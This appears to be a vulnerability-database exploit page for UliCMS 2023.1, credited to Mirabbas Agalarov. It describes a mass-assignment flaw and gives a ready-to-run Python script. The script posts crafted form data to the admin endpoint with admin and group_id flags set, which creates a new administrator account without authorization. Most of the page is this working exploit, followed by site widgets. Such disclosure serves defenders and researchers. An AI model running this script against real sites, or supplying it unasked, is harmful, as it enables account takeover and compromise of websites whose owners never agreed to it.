Ulicms 2023.1 Create Administrator

2023.05.27
Credit: Mirabbas Agalarov
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#Exploit Title: Ulicms 2023.1 - create admin user via mass assignment #Application: Ulicms #Version: 2023.1-sniffing-vicuna #Bugs: create admin user via mass assignment #Technology: PHP #Vendor URL: https://en.ulicms.de/ #Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip #Date of found: 04-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux ##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna import requests new_name=input("name: ") new_email=input("email: ") new_pass=input("password: ") url = "http://localhost/dist/admin/index.php" headers = {"Content-Type": "application/x-www-form-urlencoded"} data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language=" response = requests.post(url, headers=headers, data=data) if response.status_code == 200: print("Request is success and created new admin account") else: print("Request is failure.!!") #POC video : https://youtu.be/SCkRJzJ0FVk


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top